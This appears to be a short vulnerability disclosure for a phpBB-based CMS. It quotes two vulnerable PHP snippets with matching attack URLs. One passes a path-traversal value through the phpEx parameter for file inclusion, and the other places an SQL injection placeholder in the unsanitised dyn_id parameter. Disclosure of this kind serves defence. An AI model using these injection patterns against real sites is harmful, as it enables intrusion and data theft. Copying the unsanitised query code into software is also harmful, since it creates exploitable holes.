... include($phpbb_root_path . 'common.'.$phpEx); ...
http://localhost/24/news.php?phpEx=./../FILE
... $dyn_id = $HTTP_GET_VARS['dyn_id']; $sql = "SELECT * FROM " . CMS_DYN . " WHERE id = ".$dyn_id.""; ...
http://localhost/24/content.php?dyn_id=[SQL]
http://localhost/24/readme.txt